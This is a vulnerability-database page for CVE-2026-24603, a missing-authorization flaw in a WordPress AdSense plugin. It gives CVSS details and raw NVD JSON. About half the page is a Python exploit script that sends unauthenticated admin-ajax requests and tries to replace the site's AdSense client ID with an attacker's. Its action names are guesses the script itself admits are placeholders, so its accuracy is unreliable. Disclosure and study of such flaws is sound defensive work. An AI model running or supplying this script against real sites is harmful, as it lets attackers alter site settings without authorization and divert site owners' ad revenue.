Security Vulnerability Report
中文
CVE-2026-24603 CVSS 5.3 MEDIUM

CVE-2026-24603

Published: 2026-01-23 15:16:19
Last Modified: 2026-04-28 15:16:19

Description

Missing Authorization vulnerability in themebeez Universal Google Adsense and Ads manager universal-google-adsense-and-ads-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Universal Google Adsense and Ads manager: from n/a through <= 1.1.8.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Universal Google Adsense and Ads Manager <= 1.1.8
themebeez Universal Google Adsense and Ads Manager (所有从n/a到1.1.8的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-24603 PoC - Missing Authorization in Universal Google Adsense Plugin # Target: WordPress site with vulnerable plugin <= 1.1.8 def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2026-24603 """ # WordPress AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Test unauthorized access to plugin settings # Replace 'your-action-name' with actual plugin AJAX actions vulnerable_actions = [ 'universal_google_adsense_save_settings', 'universal_google_adsense_update_ad_config', 'universal_google_adsense_modify_ads', 'uag_save_settings', 'uag_update_adsense_code' ] print(f"[*] Testing {target_url} for CVE-2026-24603...") for action in vulnerable_actions: try: # Send request without authentication data = { 'action': action, 'nonce': '', # No nonce needed if vulnerability exists 'settings': 'test_payload' } response = requests.post(ajax_url, data=data, timeout=10, verify=False) # Check if request was processed without authorization if response.status_code == 200 and 'success' in response.text.lower(): print(f"[!] Potential vulnerability found with action: {action}") print(f"[!] Response: {response.text[:200]}") return True except requests.RequestException as e: print(f"[-] Error testing {action}: {e}") print("[*] No obvious vulnerability detected") return False def exploit_settings_modification(target_url): """ Exploit to modify plugin settings without authorization """ ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Malicious payload to modify ad settings malicious_data = { 'action': 'universal_google_adsense_save_settings', 'adsense_client_id': 'attacker-controlled-id', 'adsense_slot_id': '1234567890', 'ad_format': 'auto', 'full_widthresponsive': 'true' } print(f"[*] Attempting to modify plugin settings...") try: response = requests.post(ajax_url, data=malicious_data, timeout=10, verify=False) if response.status_code == 200: print(f"[+] Request sent, check plugin settings manually") print(f"[+] Response: {response.text}") except requests.RequestException as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-24603-poc.py <target_url>") print("Example: python cve-2026-24603-poc.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') check_vulnerability(target) exploit_settings_modification(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24603", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:18.943", "lastModified": "2026-04-28T15:16:18.580", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in themebeez Universal Google Adsense and Ads manager universal-google-adsense-and-ads-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Universal Google Adsense and Ads manager: from n/a through <= 1.1.8."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en themebeez Universal Google Adsense and Ads manager universal-google-adsense-and-ads-manager permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Universal Google Adsense and Ads manager: desde n/a hasta &lt;= 1.1.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/universal-google-adsense-and-ads-manager/vulnerability/wordpress-universal-google-adsense-and-ads-manager-plugin-1-1-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}